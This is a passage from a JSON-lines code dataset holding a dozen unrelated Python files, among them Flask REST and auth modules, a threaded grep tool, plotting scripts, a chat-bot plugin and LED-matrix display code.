oekZhuHq2sXvYXU7nafmp3uIJjvA the first six characters are oekZhu;\n(you can get one from the database or from a developer)''')\n headers = input()\n\n for x in range(1, num + 1):\n suffix = ''\n chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz-_0123456789'\n length = len(chars) - 1\n for i in range(22):\n suffix += chars[random.randint(0, length)]\n sheet.cell(row=x, column=colume).value = headers + suffix\n\n\nwb = openpyxl.Workbook()\nwb.save(filename=\"text.xlsx\")\n\nSelectResults = ['RandomOpenid']\n\nfor x in range(0, len(SelectResults)):\n globals().get(SelectResults[x])(x + 1, 10)\n\nwb.save(\"text.xlsx\")\n","sub_path":"Excel/randomtest.py","file_name":"randomtest.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"597410743","text":"import flask\nimport flask_cors\nimport json\nimport logging\n\nMIMETYPE = \"application/json\"\n\napp = flask.Flask(__name__)\nflask_cors.CORS(app) # Allow all cross-origin requests\n_LOG = logging.getLogger(__name__)\n# 
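uncomment for verbose request logging during development: 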
_LOG.setLevel(logging.DEBUG)\n\nengine_obj = None # global reference to the OttoEngine object\n\n\ndef run_server():\n app.run(host='0.0.0.0')\n\n\ndef dict_to_json_response(data_dict: dict) -> flask.Response:\n return flask.Response(json.dumps(data_dict), mimetype=MIMETYPE)\n\n\n@app.route('/shutdown', methods=['GET'])\ndef shutdown():\n '''Signal the Werkzeug server to shutdown'''\n func = flask.request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return \"\"\n\n\n@app.route('/rest/ping')\ndef ping():\n return dict_to_json_response({\"success\": True})\n\n\n@app.route('/rest/reload', methods=['GET'])\ndef reload():\n result = engine_obj.reload_rules_threadsafe()\n success = result.get(\"success\")\n if success:\n resp = {\"success\": success, \"message\": \"Rules reloaded successfully\"}\n else:\n resp = {\"success\": success, \"message\": result.get(\"message\")}\n return dict_to_json_response(resp)\n\n\n@app.route('/rest/rules', methods=['GET'])\ndef rules():\n rules = engine_obj.get_rules_threadsafe()\n resp = {\"data\": [rule.serialize() for rule in rules]}\n return dict_to_json_response(resp)\n\n\n@app.route('/rest/entities', methods=['GET'])\ndef entities():\n entities = engine_obj.get_entities_threadsafe()\n resp = json.dumps({\n \"data\": [\n {\n \"entity_id\": entity.get(\"entity_id\"),\n \"friendly_name\": entity.get(\"friendly_name\"),\n \"hidden\": entity.get(\"hidden\"),\n }\n for entity in entities\n ]\n })\n return resp\n\n\n@app.route('/rest/services', methods=['GET'])\ndef services():\n services = engine_obj.get_services_threadsafe()\n resp = json.dumps({\n \"data\": [service.serialize() for service in services]\n })\n return resp\n\n\n@app.route('/rest/rule', methods=['PUT'])\n@app.route('/rest/rule/<rule_id>', methods=['GET', 'PUT', 'DELETE'])\ndef rule(rule_id=None):\n\n if flask.request.method == 'GET':\n \"\"\"Return the rule with ID <rule_id>\"\"\"\n _LOG.info(\"GET for rule {}\".format(rule_id))\n rule = engine_obj.get_rule_threadsafe(rule_id)\n if rule is None:\n resp = json.dumps({\n \"success\": False,\n \"id\": rule_id,\n \"message\": \"Rule was not found\"\n })\n else:\n resp = json.dumps({\n \"success\": True,\n \"id\": rule_id,\n \"data\": rule.serialize()\n })\n return resp\n\n if flask.request.method == 'PUT':\n \"\"\"Store the rule as ID <rule_id>\"\"\"\n _LOG.info(\"PUT for rule {}\".format(rule_id))\n _LOG.debug(flask.request.data)\n\n data = flask.request.get_json().get(\"data\")\n\n result = engine_obj.save_rule_threadsafe(data)\n\n success = result.get(\"success\")\n if success:\n resp = json.dumps({\n \"success\": success,\n \"id\": data.get(\"id\"),\n \"message\": \"Rule saved\"\n })\n else:\n resp = json.dumps({\n \"success\": success,\n \"id\": rule_id,\n \"message\": result.get(\"message\"),\n \"data\": data\n })\n return resp\n\n if flask.request.method == 'DELETE':\n \"\"\"Delete rule with ID <rule_id>\"\"\"\n _LOG.info(\"DELETE for rule {}\".format(rule_id))\n success = engine_obj.delete_rule_threadsafe(rule_id)\n return json.dumps({\n \"success\": success,\n \"id\": rule_id\n })\n\n else:\n # POST Error 405 Method Not Allowed\n _LOG.error(\"ERROR: unsupported method {}\".format(flask.request.method))\n flask.abort(405)\n\n\n@app.route('/rest/clock/check', methods=['PUT'])\ndef clock_check():\n spec = flask.request.get_json().get('data')\n _LOG.info(spec)\n result = engine_obj.check_timespec_threadsafe(spec)\n\n success = result.get(\"success\")\n if success:\n resp = json.dumps({\n \"success\": success,\n
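# next_time below is the engine's computed next trigger time for this timespec\n 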
\"data\": {\"next_time\": result.get(\"next_time\")}\n })\n else:\n resp = json.dumps({\n \"success\": success,\n \"message\": result.get(\"message\"),\n \"data\": {\"spec\": spec}\n })\n return resp\n\n\n@app.route('/rest/logs', methods=['GET'])\ndef logs():\n resp = json.dumps({\n \"data\": [entry for entry in engine_obj.get_logs_threadsafe()]\n })\n return resp\n","sub_path":"ottoengine/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530021580","text":"# -*- coding:utf-8 -*-\n# Iteration\n# A for loop runs on any iterable object\n# Strings are iterable as well\n# Integers are not iterable\n# Iterating a dict yields its keys. Use for value in d.values() to iterate values, or for k, v in d.items() to iterate keys and values together\n# Use the Iterable type from the collections module to check whether an object is iterable\n# That import now raises a deprecation warning; import from collections.abc instead\n# from collections.abc import Iterable\n# print(isinstance(123, Iterable))\n# Python's built-in enumerate() turns a list into index-element pairs\n# The loop below prints lines like: 0 a\n# for i, value in enumerate(['a', 'b', 'c']):\n# print(i, value)\n# print(enumerate(['a', 'b', 'c']))\n# \n# for x, y in [(1, 1), (2, 4), (3, 9)]:\n# print(x, y)\n\n\ndef findMinAndMax(l):\n # find the min and max of sequence l by iteration; return them as a tuple\n if len(l) == 0:\n return None, None\n else:\n mi, ma = l[0], l[0]\n for i in l:\n if i < mi:\n mi = i\n if i > ma:\n ma = i\n return mi, ma\n\n\nif findMinAndMax([]) != (None, None):\n print('Test failed!')\nelif findMinAndMax([7]) != (7, 7):\n print('Test failed!')\nelif findMinAndMax([7, 1]) != (1, 7):\n print('Test failed!')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print('Test failed!')\nelse:\n print('Test passed!')\n","sub_path":"python/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450859698","text":"import base64\nfrom functools import wraps\n\nfrom flask import current_app, request, abort\nfrom itsdangerous import (TimedJSONWebSignatureSerializer\n as Serializer)\n\nfrom app_folder import login, db\nfrom app_folder.models import User\n\n\n@login.request_loader\ndef load_user_from_request(request):\n\n # first, try to login using the api_key url arg\n api_key = request.headers.get('Api-Key')\n if api_key:\n user = User.verify_auth_token(api_key)\n if user:\n return user\n\n # next, try to login using Basic Auth\n api_key = request.headers.get('Authorization')\n\n if api_key:\n if isinstance(api_key, bytes):\n api_key = api_key.replace(b'Basic ', b'', 1)\n elif isinstance(api_key, str):\n api_key = api_key.replace('Basic ', '', 1)\n try:\n api_key = base64.b64decode(api_key).decode()\n api_username = api_key.split(\":\")[0]\n api_password = api_key.split(\":\")[1]\n except TypeError:\n pass\n user = User.query.filter_by(username=api_username).first()\n if user:\n if user.check_password(api_password):\n return user\n else:\n return None\n\n # finally, return None if both methods did not login the user\n else:\n return None\n return None\n\n\ndef update_user_token(user):\n current_session = user.current_session_user\n new_session = current_session + 1\n # Increment session number\n user.current_session_user = new_session\n user_id_ = user.id\n auth_token = generate_auth_token(user_id_, new_session)\n user.api_key = auth_token\n db.session.add(user)\n db.session.commit()\n return user.api_key\n\n\ndef generate_auth_token(user_id, session_number, expiration=432000):\n s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)\n return s.dumps({'id': user_id, 'session': session_number})\n\n\ndef 
requires_key(func):\n @wraps(func)\n def wrapped(*args, **kwargs):\n api_key = request.headers.get('Api-Key', False)\n if api_key is False:\n abort(400)\n user = User.verify_auth_token(api_key)\n if user is None or user is False:\n abort(401)\n return func(*args, **kwargs)\n return wrapped","sub_path":"mysite/app_folder/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27491711","text":"\"\"\"empty message\n\nRevision ID: e3a07512b73f\nRevises: 105b6435def0\nCreate Date: 2019-05-16 23:02:48.181417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e3a07512b73f'\ndown_revision = '105b6435def0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('workshops', sa.Column('date', sa.String(length=10), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('workshops', 'date')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e3a07512b73f_.py","file_name":"e3a07512b73f_.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404392837","text":"\"\"\"The game Concentration.\"\"\"\n\nimport ConfigParser\nimport dallinger as dlgr\n\n\nclass ConcentrationGame(dlgr.experiments.Experiment):\n \"\"\"Define the structure of the experiment.\"\"\"\n\n def __init__(self, session):\n \"\"\"Initialize the experiment.\"\"\"\n config = ConfigParser.ConfigParser()\n config.read(\"config.txt\")\n\n super(ConcentrationGame, self).__init__(session)\n self.experiment_repeats = 1\n N = config.getint(\"Experiment\", \"num_participants\")\n self.initial_recruitment_size = N\n self.setup()\n","sub_path":"demos/concentration/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585405805","text":"import pytest\nfrom setting import Setting\nfrom modules.BlockBase import BlockBase\nfrom modules.block_wunderground import BlockWunderGround\n\nSECTION_NAME = \"WunderGroundBlock\"\n\n\n@pytest.mark.block_wunderground\ndef test_block_wunderground(logger):\n config = Setting()\n with pytest.raises(TypeError):\n BlockWunderGround(None, None)\n with pytest.raises(TypeError):\n BlockWunderGround(None, config)\n with pytest.raises(TypeError):\n BlockWunderGround(logger, None)\n block = BlockWunderGround(logger, config)\n assert block is not None\n assert isinstance(block, BlockBase)\n with pytest.raises(KeyError):\n block.init({})\n","sub_path":"test/test_block_wunderground.py","file_name":"test_block_wunderground.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"82139842","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport optparse\nimport queue\nimport threading\n\nclass Worker(threading.Thread):\n\n def __init__(self, work_queue, word, thread_id):\n super().__init__()\n self.work_queue = work_queue\n self.word = word\n self.thread_id = thread_id\n\n def run(self):\n while True:\n try:\n file = self.work_queue.get()\n self.process(file)\n finally:\n
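# task_done() runs even if process() raised, so work_queue.join() can still return\n 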
self.work_queue.task_done()\n\n def process(self, file):\n BLOCK_SIZE = 8000\n previous = ''\n try:\n with open(file, 'rb') as fh:\n while True:\n block = fh.read(BLOCK_SIZE)\n if not block:\n break\n block_decoded = block.decode('utf8', 'ignore')\n if (self.word in block_decoded or\n self.word in previous[-len(self.word):]\n + block_decoded[:len(self.word)]):\n print('{}{}'.format(self.thread_id, file))\n if len(block_decoded) != BLOCK_SIZE:\n break\n previous = block_decoded\n except EnvironmentError as err:\n print('{}{}{}'.format(self.thread_id, file, err))\n\n\ndef get_opts_args():\n parser = optparse.OptionParser()\n parser.set_usage(parser.get_usage().strip('\\n') + ' word file1/path1 [file2/path2]...')\n parser.add_option('-w', '--word', dest='word', type=str,\n help=('Single word you will be looking for.'))\n parser.add_option('-c', '--count', dest='count', type=int, default=1,\n help=('Number of child processes to run [default: 1] [max: 20].'))\n parser.add_option('-r', '--recursive', dest='recurse', action='store_true',\n default=False, help=('Recurse into subdirectories [default: False].'))\n parser.add_option('-d', '--debug', dest='debug', action='store_true',\n default=False, help=('Launch in debug mode [default: False].'))\n opts, args = parser.parse_args()\n if not args or not opts.word or (opts.count and not (0 < opts.count <= 20)):\n parser.print_help()\n sys.exit()\n return opts, opts.word, args\n\n\ndef get_files(files_or_paths, recursive):\n files_list = []\n for file_or_path in files_or_paths:\n if os.path.isfile(file_or_path):\n files_list.append(os.path.abspath(file_or_path))\n else:\n if recursive:\n for root, dirs, files in os.walk(file_or_path):\n for file in files:\n files_list.append(os.path.join(root, file))\n return files_list\n\n\ndef main():\n opts, word, args = get_opts_args()\n file_list = get_files(args, opts.recurse)\n work_queue = queue.Queue()\n for i in range(opts.count):\n thread_id = '{}: '.format(i + 1) if opts.debug else ''\n worker = Worker(work_queue, word, thread_id)\n worker.daemon = True\n worker.start()\n for file in file_list:\n work_queue.put(file)\n work_queue.join()\n\n\nmain()\n","sub_path":"Tenth Chapter/grepword-t.py","file_name":"grepword-t.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124660211","text":"'''\n\n'''\n\nfrom astropy.io import ascii\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors\nfrom matplotlib.ticker import ScalarFormatter\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\npath='/cos_pc19a_npr/programs/quasars/highest_z/MIR_LCs/'\nfile = 'NoOfEpochs_perQuasar.dat'\n\ndata_in = ascii.read(path+file) \nprint(type(data_in))\ndata = np.array(data_in).astype(np.float)\n\n\nN_points = 100000\n# Generate a normal distribution, center at x=0 and y=5\nx = np.random.randn(N_points)\ny = .4 * x + np.random.randn(100000) + 5\n\nfig, ax = plt.subplots(figsize=(8.5, 8.5)) # inches\n\n## placement of figure...\nleft = 0.16 # the left side of the subplots of the figure\nright = 0.98 # the right side of the subplots of the figure\nbottom = 0.12 # the bottom of the subplots of the figure\ntop = 0.96 # the top of the subplots of the figure\nwspace = 0.00 # the amount of width reserved for blank space between subplots\nhspace = 0.00 # the amount of height reserved for white space between subplots\nplt.subplots_adjust(left=left, bottom=bottom, right=right, top=top, 
wspace=wspace, hspace=hspace)\n\n\n## define the colormap\ncmap = plt.cm.inferno_r\n\nls = 'solid'\nlw = 1.0\nms = 60.\nms_large = ms*3.\nfontsize=24\nalpha=1.00\nnbins = 20\n\n#ax.hist(x, bins=nbins)\nax.hist(data, bins=nbins)\n\nax.set_xlim((0.9, 360))\nax.set_ylim((0.8, 300))\n\n#ax.set_xscale(\"log\", nonposx='clip')\nax.set_yscale(\"log\", nonposy='clip')\nfor axis in [ax.xaxis, ax.yaxis]:\n axis.set_major_formatter(ScalarFormatter())\n\nax.set_xlabel('No. of NEOWISE-R epochs', fontsize=fontsize)\nax.set_ylabel('No. of VHzQs', fontsize=fontsize)\nax.tick_params('x', direction='in', which='both', bottom=True, top=True, left=True, right=True, labelsize=fontsize)\nax.tick_params('y', direction='in', which='both', bottom=True, top=True, left=True, right=True, labelsize=fontsize)\n\n#plt.show()\nplt.savefig('NEOWISER_LC_histogram_temp.png', format='png')\nplt.savefig('NEOWISER_LC_histogram_temp.pdf', format='pdf')\nplt.close(fig)\n\n\n","sub_path":"MIR_LCs/NEOWISER_LC_histogram.py","file_name":"NEOWISER_LC_histogram.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40212511","text":"# -*- coding: utf-8 -*-\r\n\r\nHELPER_TIME = 0\r\nHELPER_FILE = 'dynamic/helper.txt'\r\nHELPER_GLOB = {}\r\n\r\ndb_file(HELPER_FILE, dict)\r\n\r\ntry: HELPER_GLOB = eval(read_file(HELPER_FILE))\r\nexcept: HELPER_GLOB = {}\r\n\r\n#HELPER_MSG = [u'You can list my commands by writing \"команды все\", and get help on a command with \"помощь\" plus the command name!',u'I am a free bot - you can host me by sending the \"зайти\" command with your chat address!',u'Play mafia for free right from the chat - type !мафия and invite your friends!',u'The bot UIN in ICQ is 646210729']\r\n\r\ndef hnd_autohelper_work(t, s, p):\r\n global HELPER_FILE\r\n global HELPER_GLOB\r\n if not s[1] in GROUPCHATS.keys(): return\r\n db = eval(read_file(HELPER_FILE))\r\n if s[1] in db.keys():\r\n reply(t, s, u'Command help in the status is now Disabled!')\r\n del db[s[1]]\r\n else:\r\n reply(t, s, u'Command help in the status is now Enabled!')\r\n db[s[1]] = {}\r\n HELPER_GLOB = db.copy()\r\n write_file(HELPER_FILE, str(db))\r\n \r\ndef hnd_autohelper(r, t, s, p):\r\n global HELPER_TIME\r\n global HELPER_GLOB\r\n f = 'dynamic/chatroom.list'\r\n if time.time()-HELPER_TIME>1800:\r\n HELPER_TIME = time.time()\r\n db = eval(read_file(f))\r\n list = [x for x in COMMANDS.keys() if COMMANDS[x]['access']<31 and len(COMMANDS[x]['desc'])>3]\r\n list = [x for x in list if not x in [u'пинг',u'тест',u'бан',u'кик',u'админ',u'никто',u'унбан']]\r\n for x in db.keys():\r\n for c in db[x].keys():\r\n if not c in HELPER_GLOB.keys(): continue\r\n cmd = random.choice(list)\r\n p = domish.Element(('jabber:client', 'presence'))\r\n p['to'] = u'%s/%s' % (c, get_bot_nick(c))\r\n try: p.addElement('status').addContent(u'(Command help): '+cmd + ' - ' + COMMANDS[cmd]['desc'].decode('utf8','replace'))\r\n except: continue\r\n p.addElement('show').addContent('chat')\r\n p.addElement('x', 'http://jabber.org/protocol/muc').addElement('history').__setitem__('maxchars', '0')\r\n try: reactor.callFromThread(dd, p, CLIENTS[x])\r\n except: pass\r\n\r\nregister_message_handler(hnd_autohelper)\r\nregister_command_handler(hnd_autohelper_work, 'статусхелп', ['все'], 20, 'Enables/disables automatic command help in the status', 'статусхелп', 
['статусхелп'])\r\n\r\n","sub_path":"plugins/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481478337","text":"#!/usr/bin/env python3 \n\nimport sys, subprocess, os\nimport time\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef getUserHome():\n\thomeDir = os.path.expanduser('~')\n\treturn str(homeDir)\n\ndef getUsername():\n\tusername = os.getlogin()\n\treturn str(username)\n\nif __name__ == \"__main__\":\t\n\tprint(\"\\tfake_bell\")\n\tprint(\"\\t\", sys.argv)\n\ttime.sleep(0.5)\n\tsys.exit()\n","sub_path":"fake_bell.py","file_name":"fake_bell.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"37131496","text":"from luma.led_matrix.device import max7219\r\nfrom luma.core.interface.serial import spi, noop\r\nfrom luma.core.render import canvas\r\nfrom luma.core.legacy import text\r\nfrom luma.core.legacy.font import proportional, TINY_FONT, CP437_FONT\r\n\r\nimport time\r\nimport math\r\n\r\nclass Screen:\r\n \"\"\"8x8 dotmatrix 'screen' using a max7219 chip\"\"\"\r\n\r\n def __init__(self):\r\n serial = spi(port = 0, device = 0, gpio = noop())\r\n # initialize a device of 3 matrices wide (24 leds) and 2 matrices high (16 leds)\r\n self.width = 24 # in pixels\r\n self.device = max7219(serial, width = self.width, height = 16, block_orientation=-90)\r\n # set brightness to lowest\r\n self.device.contrast(0)\r\n self.screen_sleep = False # variable to know if screen is in sleep mode\r\n\r\n def display(self, top_right, bottom_right, img):\r\n \"\"\" Display given strings and icon on the matrix screen on corresponding locations.\r\n If None is given, item is not displayed \"\"\"\r\n\r\n # if there is at least one item to display\r\n if top_right is not None or bottom_right is not None or img is not None:\r\n with canvas(self.device) as draw:\r\n if top_right is not None:\r\n text(draw, (17, -1), top_right, fill=\"white\", font=TINY_FONT)\r\n\r\n if bottom_right is not None:\r\n # draw a small roof over inside temperature\r\n draw.line((20, 7, 17, 9), fill=\"white\")\r\n draw.line((20, 7, 23, 9), fill=\"white\")\r\n\r\n text(draw, (17, 10), bottom_right, fill=\"white\", font=TINY_FONT)\r\n\r\n if img is not None:\r\n draw.bitmap((0,0), img, fill=\"white\")\r\n # if there are no items to display (all 3 are None)\r\n else:\r\n self.display_text(\"Error\")\r\n\r\n def display_top_bottom(self, top, bottom):\r\n \"\"\" displays one line at the top of the screen and one at the bottom \"\"\"\r\n\r\n if top and bottom:\r\n with canvas(self.device) as draw:\r\n text(draw, (0, 0), top, fill=\"white\", font=TINY_FONT)\r\n text(draw, (0, 8), bottom, fill=\"white\", font=TINY_FONT)\r\n\r\n else:\r\n self.display_text(\"Error\")\r\n\r\n\r\n def display_text(self, string):\r\n \"\"\" displays between 1 and 12 characters on the screen in TINY_FONT\r\n Centers text vertically and horizontally, wrapping lines if necessary. \"\"\"\r\n # TODO? make this really flexible with every possible width and height?\r\n # TODO? 
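(space-aware wrapping; see the note just below)\r\n # editor's note: the standard library already offers this - textwrap.wrap(string, 6)\r\n # breaks on spaces where possible and falls back to hard breaks for long words\r\n # TODO? 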
make it wrap at spaces if possible\r\n\r\n chars = len(string)\r\n # if string is smaller than 6 characters\r\n # (maximum of 6 characters fit on one line of the screen)\r\n if chars <= 6:\r\n # calculate centered x position for line\r\n x = self.calculate_x_pos(chars)\r\n with canvas(self.device) as draw:\r\n text(draw, (x, 4), string, fill=\"white\", font=TINY_FONT)\r\n\r\n # if string is between 7 and 12 characters\r\n if chars > 6 and chars <= 12:\r\n # divide string in 2 lines\r\n divide = math.ceil(chars / 2)\r\n # calculate centered x positions for both lines\r\n x1 = self.calculate_x_pos(divide)\r\n x2 = self.calculate_x_pos(chars - divide)\r\n\r\n with canvas(self.device) as draw:\r\n text(draw, (x1, 1), string[:divide], fill=\"white\", font=TINY_FONT)\r\n text(draw, (x2, 7), string[divide:], fill=\"white\", font=TINY_FONT)\r\n\r\n def display_bitmap(self, img):\r\n \"\"\" display a 16x16 monochrome bitmap in the center of the screen \"\"\"\r\n\r\n with canvas(self.device) as draw:\r\n if img is not None:\r\n draw.bitmap((4,0), img, fill=\"white\")\r\n\r\n def calculate_x_pos(self, amount_of_characters):\r\n \"\"\" calculate the x position so that the string can be centered horizontally\r\n according to the number of characters \"\"\"\r\n\r\n # calculate amount of pixels that the string is wide\r\n # (one character is 3 pixels wide + 1 pixel whitespace)\r\n line_length = amount_of_characters * 4 - 1\r\n # calculate centered x position on screen\r\n return self.width / 2 - math.ceil(line_length / 2)\r\n\r\n def is_sleeping(self):\r\n return self.screen_sleep\r\n\r\n def wake_up(self):\r\n \"\"\" wakes the screen from a low-power sleeping state \"\"\"\r\n\r\n self.device.show()\r\n self.screen_sleep = False\r\n print(\"Woke up screen\")\r\n\r\n def go_to_sleep(self):\r\n \"\"\" puts the screen in a low-power sleeping state \"\"\"\r\n\r\n self.device.hide()\r\n self.screen_sleep = True\r\n print(\"Put screen to sleep\")\r\n","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61663864","text":"import numpy as np\nfrom numpy.linalg import norm\nfrom typing import List, Callable, Any, Tuple\nimport scipy.stats as ss\n\nPoint: type = Any\nLabel = int\nDpoint = Tuple[Point, Label]\n\n\nD = 2\nMU = 0.\nSIG = 1.\nMEAN = np.full(D, MU)\nCOV = np.diag(np.full(D, SIG))\n\n\ndef cdf(x):\n return abs(ss.norm.cdf(x)-0.5)\n\n\ndef ppf(x):\n return abs(ss.norm.ppf(x+0.5))\n\n\ndef update():\n global MEAN, COV\n MEAN = np.full(D, MU)\n COV = np.diag(np.full(D, SIG))\n\n\ndef T(p: Point) -> Point:\n v = p-MEAN\n if norm(v) != 0:\n p = MEAN + v * ppf(norm(v)) / norm(v)\n return p\n\n\ndef Tinv(p: Point) -> Point:\n v = p - MEAN\n if norm(v) != 0:\n p = MEAN + v * cdf(norm(v)) / norm(v)\n return p\n","sub_path":"Memoriser/Memoriser/Transforms/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622661317","text":"import unittest\nimport libnox\n\nclass valorEstimado_testes(unittest.TestCase):\n # Unit test for the returned Bitcoin buy quote\n def test_valor_compra(self):\n resultado=libnox.valorEstimado('compra')\n self.assertGreater(resultado,0,'Returned buy quote below 0')\n\n # Unit test for the returned Bitcoin sell quote\n def test_valor_venda(self):\n resultado=libnox.valorEstimado('venda')\n
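# sanity: a sell quote must be strictly positive\n 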
self.assertGreater(resultado,0,'Returned sell quote below 0')\n\n # Unit test comparing the sell price with the buy price\n def test_comparar_compra_venda(self):\n vlcompra = libnox.valorEstimado('compra')\n vlvenda=libnox.valorEstimado('venda')\n self.assertGreater(vlvenda,vlcompra,'Returned buy quote greater than sell quote')\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/valorEstimado_testes.py","file_name":"valorEstimado_testes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402826217","text":"# Copyright 2017-2020 Lawrence Livermore National Security, LLC and other\n# CallFlow Project Developers. See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: MIT\n\nimport json\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.manifold import TSNE, MDS\nfrom sklearn.cluster import KMeans\nfrom callflow.algorithms import KMedoids\n\n# from callflow.algorithms import DeltaConSimilarity\n\n\nclass ParameterProjection:\n \"\"\"\n Parameter projection view\n \"\"\"\n\n def __init__(self, supergraph, targetDataset=\"\", n_cluster=3):\n\n self.df = supergraph.gf.df\n self.datasets = self.df[\"dataset\"].unique().tolist()\n self.projection = \"MDS\"\n self.clustering = \"k_means\"\n self.n_cluster = int(n_cluster)\n self.targetDataset = targetDataset\n if len(self.datasets) >= self.n_cluster:\n self.result = self.run()\n else:\n self.result = pd.DataFrame({})\n\n def add_df_params(self, dataset):\n ret = {}\n ret[\"max_inclusive_time\"] = self.df.loc[self.df[\"dataset\"] == dataset][\n \"time (inc)\"\n ].max()\n ret[\"max_exclusive_time\"] = self.df.loc[self.df[\"dataset\"] == dataset][\n \"time\"\n ].max()\n ret[\"rank_count\"] = len(\n self.df.loc[self.df[\"dataset\"] == dataset][\"rank\"].unique()\n )\n # ret['similarity'] = self.similarities[self.datasetOrder[self.targetDataset]]\n return ret\n\n def dump_similarities(self, name):\n similarity_filepath = name + \"/\" + \"similarity.json\"\n with open(similarity_filepath, \"r\") as similarity_file:\n self.similarities = json.load(similarity_file)\n\n def run(self):\n rows = []\n for idx, dataset in enumerate(self.datasets):\n df_params = self.add_df_params(dataset)\n rows.append(df_params)\n # self.states[state].projection_data.update(df_params)\n\n # row_list = []\n # for idx, state in enumerate(self.states):\n # if(state != 'ensemble'):\n # row_list.append(self.states[state].projection_data)\n\n df = pd.DataFrame(rows)\n\n # TODO: Remove all string columns from the dataframe.\n if \"dataset\" in df.columns:\n df = df.drop(columns=[\"dataset\"])\n x = df.values # returns a numpy array\n\n # Scale the values to the range 0 to 1\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(x)\n df = pd.DataFrame(x_scaled)\n X = np.vstack([df.values.tolist()])\n\n random_number = 20150101\n if self.projection == \"MDS\":\n proj = MDS(random_state=random_number).fit_transform(X)\n\n elif self.projection == \"TSNE\":\n proj = TSNE(random_state=random_number).fit_transform(X)\n\n ret = pd.DataFrame(proj, columns=list(\"xy\"))\n ret[\"dataset\"] = self.datasets\n\n # if self.clustering == \"prog_k_means\":\n # self.clusters = ProgKMeans(n_clusters=self.n_cluster)\n # self.clusters.progressive_fit(X, latency_limit_in_msec=100)\n # ret[\"label\"] = self.clusters.predict(X).tolist()\n\n if self.clustering == \"k_medoids\":\n
self.clusters = KMedoids(n_cluster=self.n_cluster)\n ret[\"label\"] = self.clusters.fit(X)\n elif self.clustering == \"k_means\":\n self.clusters = KMeans(\n n_clusters=self.n_cluster, random_state=random_number\n )\n ret[\"label\"] = self.clusters.fit(X).labels_\n\n return ret\n","sub_path":"callflow/modules/parameter_projection.py","file_name":"parameter_projection.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165946680","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 10:32:20 2018\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pims\nimport fluids2d.backlight as backlight\nimport fluids2d.bubble_pinchoff as pinchoff\nimport comps\nfrom scipy.interpolate import interp2d\nfrom scipy.signal import medfilt, argrelextrema\nimport scipy.spatial.distance\nimport skimage.morphology\n\n\ncine_name = r'bubble_pinchoff_needleShortPink_fps100k_viewI_pumpsSeries12V_v3'\nmeta = pinchoff.get_meta_dict(cine_name)\nfolder = comps.cf(meta['data_loc'])+str(meta['date_folder'])+r'\\\\'\n\nc = pims.open(folder+cine_name+'.cine')\n\nthresh=50 